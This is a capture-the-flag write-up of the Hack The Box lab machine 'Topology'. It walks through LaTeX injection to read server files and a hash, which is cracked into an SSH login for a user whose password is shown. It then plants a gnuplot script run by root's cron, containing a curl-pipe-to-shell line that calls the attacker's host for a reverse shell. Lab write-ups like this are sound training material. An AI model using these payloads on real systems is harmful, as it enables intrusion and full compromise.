Topology

Summary

Topology is an easy machine which you have to explore a Latex Injection to get arbitrary file read on the machine in order to read the hash for the user vdaisley , after you crack it you get his password to log in the machine through SSH. On the machine, after an enumeration, you discover a cron routine running gnuplot on all files in a directory you have write permission as. So you must write a malicious plot script to execute a reverse shell to you get root.

Recon

Port scan

f69@pr0l4ps0 ~/Documents/ctf/htb/topology $ rustscan -a 10.10.11.217 --ulimit 5000 -- -sC -sV --min-rate=400 -oN '{{ip}}.txt'

# Nmap 7.94 scan initiated Fri Jun 30 23:53:32 2023 as: nmap -vvv -p 22,80 -sC -sV --min-rate=400 -oN 10.10.11.217.txt 10.10.11.217
Nmap scan report for dev.topology.htb (10.10.11.217)
Host is up, received syn-ack (0.14s latency).
Scanned at 2023-06-30 23:53:32 -03 for 11s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC65qOGPSRC7ko+vPGrMrUKptY7vMtBZuaDUQTNURCs5lRBkCFZIrXTGf/Xmg9MYZTnwm+0dMjIZTUZnQvbj4kdsmzWUOxg5Leumcy+pR/AhBqLw2wyC4kcX+fr/1mcAgbqZnCczedIcQyjjO9M1BQqUMQ7+rHDpRBxV9+PeI9kmGyF6638DJP7P/R2h1N9MuAlVohfYtgIkEMpvfCUv5g/VIRV4atP9x+11FHKae5/xiK95hsIgKYCQtWXvV7oHLs3rB0M5fayka1vOGgn6/nzQ99pZUMmUxPUrjf4V3Pa1XWkS5TSv2krkLXNnxQHoZOMQNKGmDdk0M8UfuClEYiHt+zDDYWPI672OK/qRNI7azALWU9OfOzhK3WWLKXloUImRiM0lFvp4edffENyiAiu8sWHWTED0tdse2xg8OfZ6jpNVertFTTbnilwrh2P5oWq+iVWGL8yTFeXvaSK5fq9g9ohD8FerF2DjRbj0lVonsbtKS1F0uaDp/IEaedjAeE=
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIR4Yogc3XXHR1rv03CD80VeuNTF/y2dQcRyZCo4Z3spJ0i+YJVQe/3nTxekStsHk8J8R28Y4CDP7h0h9vnlLWo=
|   256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaM68hPSVQXNWZbTV88LsN41odqyoxxgwKEb1SOPm5k
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Under construction
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The TCP port scan showed no port but the defaults SSH and HTTP ports, so let's take a look in the web page.

At first view, we have a software projects list, which has a link which redirect us to latex.topology.htb, so we can add it and the topology.htb domain to our /etc/hosts and start to fuzzing to see if we get more subdomains.

Subdomain Fuzzing

f69@pr0l4ps0 ~/Documents/ctf/htb/topology $ ffuf -u http://topology.htb -H "Host: FUZZ.topology.htb" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 100 -mc all -fs 6767

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://topology.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt
 :: Header           : Host: FUZZ.topology.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: all
 :: Filter           : Response size: 6767
________________________________________________

[Status: 401, Size: 463, Words: 42, Lines: 15, Duration: 143ms]
    * FUZZ: dev

[Status: 200, Size: 108, Words: 5, Lines: 6, Duration: 7172ms]
    * FUZZ: stats

If we try to access the dev.topology.htb subdomain we get a HTTP form asking our password:

So, let's try to explore the latex subdomain.

Foothold

Entering the subdomain, we got an Index of listing all the files at the page.

We have a PHP page named equation.php, let's enter it.

LaTeX Injection

At first glance we have a field to submit LaTeX code, intercepting the communication with Burp Suite and trying some payloads from Hacktricks LaTeX injection page.

We can succefully read a line from the /etc/os-release file on the machine, and if we want we can read more lines just repeating this part:

\read\file to\line
\text{\line}

The page has some blacklists like loop, while, and, etc. The way we are retrieving data with this payload isn't effective because:

• if the file be very large we cannot read it because the has a size limit for the LaTeX code;

• if the file don't contain a newline character we cannot read it.

So, reading more techniques about file reading with LaTeX on the previous article from Hacktricks, I discovered the function lstinputlisting, which basically is used to list codes. As we cannot use \begin and \and we must to add a $ at the start and and from our payload.

And we can read all the /etc/passwd file.

Shell as vdaisley

So, as we got that form to login on the dev subdomain, the first thing I thought was try to get the password at the .htpasswd located on the subdomain root: /var/www/dev.

And now we got the hash, trying to crack it with John The Ripper, we get the password calculus20 from the user vdaisley.

Trying to login the machine remotely with SSH with his creds we got a shell sucefully.

f69@pr0l4ps0 ~/Documents/ctf/htb/topology $ ssh vdaisley@topology.htb
The authenticity of host 'topology.htb (10.10.11.217)' can't be established.
ED25519 key fingerprint is SHA256:F9cjnqv7HiOrntVKpXYGmE9oEaCfHm5pjfgayE/0OK0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'topology.htb' (ED25519) to the list of known hosts.
vdaisley@topology.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

vdaisley@topology:~$ 

Shell as root

At my enumerationg, I discovered with pspy the machine is running a cron as the root user executing gnuplot with all the files terminating with .plt located in /opt/gnuplot.

Checking the permission in that directory, I saw I has write permission.

So, searching in the docs how I could make a malicious GNU Plot script to give me a shell, I found this man page explaining how to execute system commands with GNU Plot, so I made a one liner to download my reverse shell and execute it.

system "/usr/bin/curl 10.10.14.141|/bin/sh"

Waiting a little bit, verifying with pspy I saw the root executed my reverse shell.

And checking my netcat listener:

[f69@pr0l4ps0 topology]$ nc -lvnp 6901
Listening on 0.0.0.0 6901
Connection received on 10.10.11.217 56506
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)